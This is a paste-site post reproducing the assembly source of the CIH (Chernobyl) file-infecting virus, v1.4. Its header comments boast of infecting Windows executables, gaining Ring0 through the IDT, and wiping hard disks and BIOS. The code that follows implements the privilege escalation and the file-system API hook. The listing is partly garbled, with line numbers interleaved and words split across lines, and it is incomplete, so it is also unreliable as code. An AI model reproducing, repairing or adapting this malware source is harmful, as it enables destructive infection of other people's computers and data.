crazykid_ceh

project 2

May 2nd, 2014
  1. ; ********************************************************************
  2. ********
  3. ; * The Virus Program Information
  4. *
  5. ; ********************************************************************
  6. ********
  7. ; *
  8. *
  9. ; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
  11. ; * Create Date : 04/26/1998 Now Version : 1.4
  12. *
  13. ; * Modification Time : 05/31/1998
  14. *
  15. ; *
  16. *
  17. ; * Turbo Assembler Version 4.0 : tasm /m cih
  18. *
  19. ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
  20. *
  21. ; *
  22. *
  23. ; *===================================================================
  24. =======*
  25. ; * Modification History
  26. *
  27. ; *===================================================================
  28. =======*
  29. ; * v1.0 1. Create the Virus Program.
  30. *
  31. ; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
  32. *
  33. ; * 04/26/1998 3. Virus Code doesn't Reload into System.
  34. *
  35. ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
  37. ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
  39. ; * 6. When System Opens Existing PE File, the File will be *
  41. ; * Infected, and the File doesn't be Reinfected.
  42. *
  43. ; * 7. It is also Infected, even the File is Read-Only.
  44. *
  45. ; * 8. When the File is Infected, the Modification Date and Time *
  47. ; * of the File also don't be Changed.
  48. *
  49. ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
  50. Call *
  51. ; * Previous FileSystemApiHook, it will Call the Function *
  53. ; * that the IFS Manager Would Normally Call to Implement *
  55. ; * this Particular I/O Request.
  56. *
  57. ; * 10. The Virus Size is only 656 Bytes.
  58. *
  59. ; *===================================================================
  60. =======*
  61. ; * v1.1 1. Especially, the File that be Infected will not Increase *
  63. ; * it's Size... ^__^
  64. *
  65. ; * 05/15/1998 2. Hook and Modify Structured Exception Handling.
  66. *
  67. ; * When Exception Error Occurs, Our OS System should be in *
  69. ; * Windows NT. So My Cute Virus will not Continue to Run, *
  71. ; * it will Jump to Original Application to Run.
  72. *
  73. ; * 3. Use Better Algorithm, Reduce Virus Code Size.
  74. *
  75. ; * 4. The Virus "Basic" Size is only 796 Bytes.
  76. *
  77. ; *===================================================================
  78. =======*
  79. ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
  80. *
  81. ; * 2. Modify the Bug of v1.1
  82. *
  83. ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
  84. *
  85. ; *===================================================================
  86. =======*
  87. ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
  89. ; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
  91. ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
  92. *
  93. ; *===================================================================
  94. =======*
  95. ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
  97. ; * 2. Change the Date of Killing Computers.
  98. *
  99. ; * 05/31/1998 3. Modify Virus Version Copyright.
  100. *
  101. ; * 4. The Virus "Basic" Size is 1019 Bytes.
  102. *
  103. ; ********************************************************************
  104. ********
  105.  
  106.  
  107. .586P
  108.  
  109.  
  110.  
  111. ; ********************************************************************
  112. ********
  113. ; * Original PE Executable File(Don't Modify this Section)
  114. *
  115. ; ********************************************************************
  116. ********
  117.  
  118.  
  119. OriginalAppEXE SEGMENT
  120.  
  121.  
  122.  
  123. FileHeader:
  124.  
  125. db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
  126.  
  127. db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
  128.  
  129. db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  130.  
  131. db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  132.  
  133. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  134.  
  135. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  136.  
  137. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  138.  
  139. db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
  140.  
  141. db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
  142.  
  143. db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
  144.  
  145. db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
  146.  
  147. db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
  148.  
  149. db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
  150.  
  151. db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
  152.  
  153. db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
  154.  
  155. db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  156.  
  157. db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
  158.  
  159. db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
  160.  
  161. db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
  162.  
  163. db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
  164.  
  165. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  166.  
  167. db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
  168.  
  169. db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
  170.  
  171. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
  172.  
  173. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  174.  
  175. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  176.  
  177. db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
  178.  
  179. db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
  180.  
  181. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  182.  
  183. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
  184.  
  185. db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
  186.  
  187. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  188.  
  189. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  190.  
  191. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  192.  
  193. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  194.  
  195. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  196.  
  197. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  198.  
  199. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  200.  
  201. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  202.  
  203. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  204.  
  205. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  206.  
  207. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  208.  
  209. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  210.  
  211. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  212.  
  213. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  214.  
  215. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  216.  
  217. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  218.  
  219. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  220.  
  221. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  222.  
  223. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  224.  
  225. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  226.  
  227. db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
  228.  
  229. dd 00000000h, VirusSize
  230.  
  231.  
  232.  
  233. lea ecx, StopToRunVirusCode-@0[ebx]
  234.  
  235. push ecx
  236.  
  237.  
  238.  
  239. push eax
  240.  
  241.  
  242.  
  243. ; *************************************
  244.  
  245. ; * Let's Modify *
  246.  
  247. ; * IDT(Interrupt Descriptor Table) *
  248.  
  249. ; * to Get Ring0 Privilege... *
  250.  
  251. ; *************************************
  252.  
  253.  
  254.  
  255. push eax ;
  256.  
  257. sidt [esp-02h] ; Get IDT Base Address
  258.  
  259. pop ebx ;
  260.  
  261.  
  262.  
  263. add ebx, HookExceptionNumber*08h+04h ; ZF
  264. = 0
  265.  
  266.  
  267. cli
  268.  
  269.  
  270.  
  271. mov ebp, [ebx] ; Get Exception Base
  272.  
  273. mov bp, [ebx-04h] ; Entry Point
  274.  
  275.  
  276.  
  277. lea esi, MyExceptionHook-@1[ecx]
  278.  
  279.  
  280.  
  281. push esi
  282.  
  283.  
  284.  
  285. mov [ebx-04h], si ;
  286.  
  287. shr esi, 16 ; Modify Excep
  288. tion
  289. mov [ebx+02h], si ; Entry Point
  290. Address
  291.  
  292.  
  293. pop esi
  294.  
  295.  
  296.  
  297. ; *************************************
  298.  
  299. ; * Generate Exception to Get Ring0 *
  300.  
  301. ; *************************************
  302.  
  303.  
  304.  
  305. int HookExceptionNumber ; GenerateExce
  306. ption
  307. ReturnAddressOfEndException = $
  308.  
  309.  
  310.  
  311. ; *************************************
  312.  
  313. ; * Merge All Virus Code Section *
  314.  
  315. ; *************************************
  316.  
  317.  
  318.  
  319. ; *************************************
  320.  
  321. ; * Generate Exception Again *
  322.  
  323. ; *************************************
  324.  
  325.  
  326.  
  327. int HookExceptionNumber ; GenerateExce
  328. ption Aga
  329.  
  330.  
  331.  
  332.  
  333. ; *************************************
  334.  
  335. ; * Let's Restore *
  336.  
  337. ; * Structured Exception Handling *
  338.  
  339. ; *************************************
  340.  
  341.  
  342.  
  343. ReadyRestoreSE:
  344.  
  345. sti
  346.  
  347.  
  348.  
  349. xor ebx, ebx
  350.  
  351.  
  352.  
  353. jmp RestoreSE
  354.  
  355.  
  356.  
  357. ; *************************************
  358.  
  359. ; * When Exception Error Occurs, *
  360.  
  361. ; * Our OS System should be in NT. *
  362.  
  363. ; * So My Cute Virus will not *
  364.  
  365. ; * Continue to Run, it Jumps to *
  366.  
  367. ; * Original Application to Run. *
  368.  
  369. ; *************************************
  370.  
  371.  
  372.  
  373. StopToRunVirusCode:
  374.  
  375. @1 = StopToRunVirusCode
  376.  
  377.  
  378.  
  379. xor ebx, ebx
  380.  
  381. mov eax, fs:[ebx]
  382.  
  383. mov esp, [eax]
  384.  
  385.  
  386.  
  387. RestoreSE:
  388.  
  389. pop dword ptr fs:[ebx]
  390.  
  391. pop eax
  392.  
  393.  
  394.  
  395. ; *************************************
  396.  
  397. ; * Return Original App to Execute *
  398.  
  399. ; *************************************
  400.  
  401.  
  402.  
  403. pop ebp
  404.  
  405.  
  406.  
  407. push 00401000h ; Push Original
  408.  
  409. OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
  410. tack
  411.  
  412.  
  413. ret ; Return to Original App Entry Point
  414.  
  415.  
  416.  
  417. ; *********************************************************
  418.  
  419. ; * Ring0 Virus Game Initial Program *
  420.  
  421. ; *********************************************************
  422.  
  423.  
  424.  
  425. MyExceptionHook:
  426.  
  427. @2 = MyExceptionHook
  428.  
  429.  
  430.  
  431. jz InstallMyFileSystemApiHook
  432.  
  433.  
  434.  
  435. ; *************************************
  436.  
  437. ; * Do My Virus Exist in System !? *
  438.  
  439. ; *************************************
  440.  
  441.  
  442.  
  443. mov ecx, dr0
  444.  
  445. jecxz AllocateSystemMemoryPage
  446.  
  447.  
  448.  
  449. add dword ptr [esp], ReadyRestoreSE-Return
  450. AddressOf
  451. dException
  452.  
  453.  
  454.  
  455. ; *************************************
  456.  
  457. ; * Return to Ring3 Initial Program *
  458.  
  459. ; *************************************
  460.  
  461.  
  462.  
  463. ExitRing0Init:
  464.  
  465. mov [ebx-04h], bp ;
  466.  
  467. shr ebp, 16 ; Restore Exception
  468.  
  469. mov [ebx+02h], bp ;
  470.  
  471.  
  472.  
  473. iretd
  474.  
  475.  
  476.  
  477. ; *************************************
  478.  
  479. ; * Allocate SystemMemory Page to Use *
  480.  
  481. ; *************************************
  482.  
  483.  
  484.  
  485. AllocateSystemMemoryPage:
  486.  
  487.  
  488.  
  489. mov dr0, ebx ; Set the Mark of My V
  490. irus Exis
  491. in System
  492.  
  493.  
  494.  
  495. push 00000000fh ;
  496.  
  497. push ecx ;
  498.  
  499. push 0ffffffffh ;
  500.  
  501. push ecx ;
  502.  
  503. push ecx ;
  504.  
  505. push ecx ;
  506.  
  507. push 000000001h ;
  508.  
  509. push 000000002h ;
  510.  
  511. int 20h ; VMMCALL _PageAllocat
  512. e
  513. _PageAllocate = $ ;
  514.  
  515. dd 00010053h ; Use EAX, ECX, EDX, a
  516. nd flags
  517. add esp, 08h*04h
  518.  
  519.  
  520.  
  521. xchg edi, eax ; EDI = SystemMemory S
  522. tart Addr
  523. s
  524.  
  525.  
  526.  
  527. lea eax, MyVirusStart-@2[esi]
  528.  
  529.  
  530.  
  531. iretd ; Return to Ring3 Initial Program
  532.  
  533.  
  534.  
  535. ; *************************************
  536.  
  537. ; * Install My File System Api Hook *
  538.  
  539. ; *************************************
  540.  
  541.  
  542.  
  543. InstallMyFileSystemApiHook:
  544.  
  545.  
  546.  
  547. lea eax, FileSystemApiHook-@6[edi]
  548.  
  549.  
  550.  
  551. push eax ;
  552.  
  553. int 20h ; VXDCALL IFSMgr_InstallFileSyste
  554. mApiHook
  555. IFSMgr_InstallFileSystemApiHook = $ ;
  556.  
  557. dd 00400067h ; Use EAX, ECX, EDX, a
  558. nd flags
  559.  
  560.  
  561. mov dr0, eax ; Save OldFileSystemAp
  562. iHook Add
  563. ss
  564.  
  565.  
  566.  
  567. pop eax ; EAX = FileSystemApiHook Addr
  568. ess
  569.  
  570.  
  571. ; Save Old IFSMgr_InstallFileSystemApiHook Ent
  572. ry Point
  573. mov ecx, IFSMgr_InstallFileSystemApiHook-@
  574. 2[esi]
  575. mov edx, [ecx]
  576.  
  577. mov OldInstallFileSystemApiHook-@3[eax], e
  578. dx
  579.  
  580.  
  581. ; Modify IFSMgr_InstallFileSystemApiHook Entry
  582. Point
  583. lea eax, InstallFileSystemApiHook-@3[eax]
  584.  
  585. mov [ecx], eax
  586.  
  587.  
  588.  
  589. cli
  590.  
  591.  
  592.  
  593. jmp ExitRing0Init
  594.  
  595.  
  596.  
  597. ; *********************************************************
  598.  
  599. ; * Code Size of Merge Virus Code Section *
  600.  
  601. ; *********************************************************
  602.  
  603.  
  604.  
  605. CodeSizeOfMergeVirusCodeSection = offset $
  606.  
  607.  
  608.  
  609. ; *********************************************************
  610.  
  611. ; * IFSMgr_InstallFileSystemApiHook *
  612.  
  613. ; *********************************************************
  614.  
  615.  
  616.  
  617. InstallFileSystemApiHook:
  618.  
  619. push ebx
  620.  
  621.  
  622.  
  623. call @4 ;
  624.  
  625. @4: ;
  626.  
  627. pop ebx ; mov ebx, offset FileSystemAp
  628. iHook
  629. add ebx, FileSystemApiHook-@4 ;
  630.  
  631.  
  632.  
  633. push ebx
  634.  
  635. int 20h ; VXDCALL IFSMgr_RemoveFileSystem
  636. ApiHook
  637. IFSMgr_RemoveFileSystemApiHook = $
  638.  
  639. dd 00400068h ; Use EAX, ECX, EDX, a
  640. nd flags
  641. pop eax
  642.  
  643.  
  644.  
  645. ; Call Original IFSMgr_InstallFileSystemApiHoo
  646. k
  647. ; to Link Client FileSystemApiHook
  648.  
  649. push dword ptr [esp+8]
  650.  
  651. call OldInstallFileSystemApiHook-@3[ebx]
  652.  
  653. pop ecx
  654.  
  655.  
  656.  
  657. push eax
  658.  
  659.  
  660.  
  661. ; Call Original IFSMgr_InstallFileSystemApiHoo
  662. k
  663. ; to Link My FileSystemApiHook
  664.  
  665. push ebx
  666.  
  667. call OldInstallFileSystemApiHook-@3[ebx]
  668.  
  669. pop ecx
  670.  
  671.  
  672.  
  673. mov dr0, eax ; Adjust OldFileSystem
  674. ApiHook A
  675. ress
  676.  
  677.  
  678.  
  679. pop eax
  680.  
  681.  
  682.  
  683. pop ebx
  684.  
  685.  
  686.  
  687. ret
  688.  
  689.  
  690.  
  691. ; *********************************************************
  692.  
  693. ; * Static Data *
  694.  
  695. ; *********************************************************
  696.  
  697.  
  698.  
  699. OldInstallFileSystemApiHook dd ?
  700.  